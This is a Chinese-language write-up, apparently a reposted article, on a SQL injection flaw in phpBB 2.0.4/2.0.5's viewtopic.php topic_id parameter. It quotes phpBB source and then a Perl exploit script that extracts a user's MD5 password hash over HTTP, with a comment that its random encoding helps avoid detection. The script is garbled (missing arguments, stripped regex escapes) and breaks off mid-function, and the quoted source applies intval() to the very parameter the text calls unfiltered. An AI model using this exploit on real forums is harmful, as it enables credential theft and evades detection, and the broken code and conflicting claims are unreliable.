|
好了,我们还是来分析一下漏洞产生的原因吧。拿viewtopic.php页面来说,由于在调用viewtopic.php时,直接从GET请求中获得"topic_id"并传递给SQL查询命令,而并没有进行一些过滤的处理,攻击者可以提交特殊的SQL字符串用于获得MD5密码,获得此密码信息可以用于自动登录或者进行暴力破解。(我想应该不会有人想去暴力破解吧,除非有特别重要的原因)。先看一下相关源代码:
以下是引用片段: # if(isset($HTTP_GET_VARS[POST_TOPIC_URL])) # { # $topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]); # } # elseif(isset($HTTP_GET_VARS['topic'])) # { # $topic_id=intval($HTTP_GET_VARS['topic']); # } 从上面我们可以看出,如果提交的view=newest并且sid设置了值的话,执行的查询代码像下面的这个样子(如果你还没看过PHPBB源代码的话,建议你看了再对着这里来看,受影响系统为:phpBB 2.0.5和phpBB 2.0.4)。
以下是引用片段: # $sql = "SELECT p.post_id # FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1";
Rick提供了下面的这断测试代码: use IO::Socket; $remote = shift || 'localhost'; $view_topic = shift || '/phpBB2/viewtopic.php'; $uid = shift || 2; $port = 80; $dBType = 'mysql4'; # mysql4 or pgsql print "Trying to get password hash for uid $uid server $remote dbtype: $dBType "; $p = ""; for($index=1; $index<=32; $index++) { $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldnt connect to $remote:$port : $@ "; $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0 "; print $socket $str; print $socket "Cookie: phpBB2mysql_sid=1 "; # replace this for pgsql or remove it print $socket "Host: $remote "; while ($answer = <$socket>) { if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p= { $p .= chr (); } } close($socket); } print " MD5 Hash for uid $uid is $p "; # random encode str. helps avoid detection sub random_encode (责任编辑:admin) |